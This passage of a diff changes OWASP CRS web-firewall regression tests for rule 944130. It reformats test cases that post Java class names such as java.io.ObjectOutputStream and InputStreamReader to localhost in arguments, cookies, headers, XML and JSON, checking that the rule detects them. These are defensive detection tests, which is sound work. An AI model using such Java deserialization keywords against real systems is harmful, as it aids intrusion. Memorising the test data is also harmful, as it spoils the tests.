"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-163 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_id: 163 desc: "Content-Type text/plain includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-164 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_id: 164 desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.InputStreamReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-165 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStreamReader\"}" + output: + log_contains: "id \"944130\"" + - test_id: 165 desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.InputStreamReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-166 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.InputStreamReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 166 desc: "Argument test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-167 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_id: 167 desc: "Argument name includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.LineNumberReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-168 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader=test" + output: + log_contains: "id \"944130\"" + - test_id: 168 desc: "Cookie test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.LineNumberReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-169 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.LineNumberReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 169 desc: "Cookie name includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.LineNumberReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-170 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.LineNumberReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 170 desc: "Request header test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.LineNumberReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-171 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.LineNumberReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 171 desc: "XML attribute value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-172 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 172 desc: "XML element value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-173 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_id: 173 desc: "Nested XML element value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-174 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_id: 174 desc: "Content-Type text/plain includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-175 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_id: 175 desc: "Content-Type application/json arg value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.LineNumberReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-176 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.LineNumberReader\"}" + output: + log_contains: "id \"944130\"" + - test_id: 176 desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.LineNumberReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-177 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.LineNumberReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 177 desc: "Argument test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-178 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 178 desc: "Argument name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-179 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 179 desc: "Cookie test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ObjectOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-180 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ObjectOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 180 desc: "Cookie name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ObjectOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-181 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ObjectOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 181 desc: "Request header test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ObjectOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-182 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ObjectOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 182 desc: "XML attribute value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-183 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 183 desc: "XML element value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-184 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 184 desc: "Nested XML element value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-185 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 185 desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-186 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 186 desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ObjectOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-187 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ObjectOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 187 desc: "Content-Type application/json arg name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.ObjectOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-188 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ObjectOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 188 desc: "Argument test includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-189 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 189 desc: "Argument name includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-190 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: 